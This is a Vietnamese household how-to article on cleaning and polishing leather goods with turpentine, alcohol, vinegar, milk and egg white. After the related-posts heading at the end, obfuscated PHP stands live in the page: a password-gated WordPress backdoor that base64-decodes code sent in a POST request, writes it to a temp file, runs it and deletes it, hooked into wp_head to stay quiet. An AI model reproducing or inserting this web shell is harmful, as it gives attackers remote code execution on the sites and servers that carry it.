Cách giữ đồ da luôn như mới

Da là một chất liệu được khá nhiều người ưa chuộng khi mua sắm các vật dụng thời trang như giày, ví thắt lưng, túi xách…Trong thế giới thời trang, có rất nhiều loại da được sử dụng như da bò, da trâu, da cừu hay da cá sấu…nhưng chúng đều có một điểm chung là sẽ mất đi độ bóng và nhanh cũ khi sử dụng một thời gian, lúc đó sẽ làm mất đi giá trị thẩm mỹ của chúng. Để những sản phẩm thời trang làm từ da luôn luôn bóng mới, bạn phải biết cách làm sạch và đánh bóng chúng hợp lí. Sau đây Wikicachlam sẽ hướng dẫn các bạn cách giữ đồ da luôn như mới hiệu quả.

Hướng dẫn cách giữ đồ da luôn như mới

Cách Làm:

 

1.Làm sạch vết mốc trên đồ da.

Đối với những sản phẩm thời trang từ da nếu bạn không biết cách làm sạch thì đồ da có thể sẽ bị hỏng, trong trường hợp này bạn hãy dùng vải sạch thấm dầu thông và chùi sạch vết mốc. Nếu vết mốc ăn sâu vào da, bạn có thể dùng giấy nhám đánh lên vết mốc cho sạch, đánh xong bạn dùng sơn cùng màu da tô chỗ da đó rồi dùng sáp đánh bóng lại. Làm cách này đồ dùng da của bạn sẽ sớm trở lại như cũ, vết mốc sẽ không còn lo ngại của bạn nữa.

Cách giữ đồ da luôn như mới-1

Hoặc bạn có thể hòa cồn với nước rồi dùng vải thấm vào dung dịch và chùi lên vết mốc. Nếu vết mốc cứng đầu, bạn hãy dùng xà phòng bánh chà mạnh lên vết mốc, sau đó dùng khăn ướt để tẩy đi phần xà phòng còn bám trên da và để da tự khô.

Xem Thêm  STT nắm tay người yêu, STT nắm tay anh đi khắp thế gian

2.Làm sạch vết mỡ trên đồ da.

Khi đồ da của bạn bị dính vết mỡ cứng đầu, để làm sạch bạn hãy dùng bông gòn thấm vào dung dịch giấm (Vinegar) rồi chùi lên vết mỡ, tuy nhiên với cách này sẽ làm cho màu da ở đó nhạt đi vì vậy sau khi chùi xong bạn hãy lấy sáp cùng màu để đánh bóng lại.

 

3.Đánh bóng đồ da bằng sữa tươi

Đồ da của bạn sau vài lần sử dụng có thể sẽ không còn sáng bóng như cũ và trở nên khô cứng, khiến bạn rất khó chịu. Để đánh bóng cho đồ da, bạn hãy dùng vải mềm thấm sữa tươi rồi chà xát lên đồ da, bạn chà xoay tròn để đạt hiệu quả nhất. Với cách này đồ da của bạn sẽ mới và bóng trở lại. Chùi xong bạn nhớ dùng vải khô lau sạch nhé!

4.Đánh bóng đồ da bằng trứng gà

Để làm bóng đồ thời trang bằng da bằng cách này, bạn hãy dùng một quả trứng gà chỉ lấy lòng trắng trứng cho vào bát và đánh bông lên, rồi bạn dùng vải sạch thấm trứng gà và đánh mạnh lên đồ da bạn cần đánh bóng, sau đó bạn hãy dùng khăn sạch để chùi sạch. Đồ da của bạn sẽ mềm mại và bóng lên tức thì đấy!

Cách giữ đồ da luôn như mới-2

Với những bước đơn giản như trên bạn có thể làm mới những sản phẩm thời trang làm từ da của mình rồi đấy. Hãy chia sẻ những bí quyết hữu ích này đến người thân bạn bè của mình nhé. Chúc bạn thành công

Xem Thêm  Những hình xăm mặt quỷ đẹp nhất

Wiki Cách Làm

 

Bài Liên Quan:

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}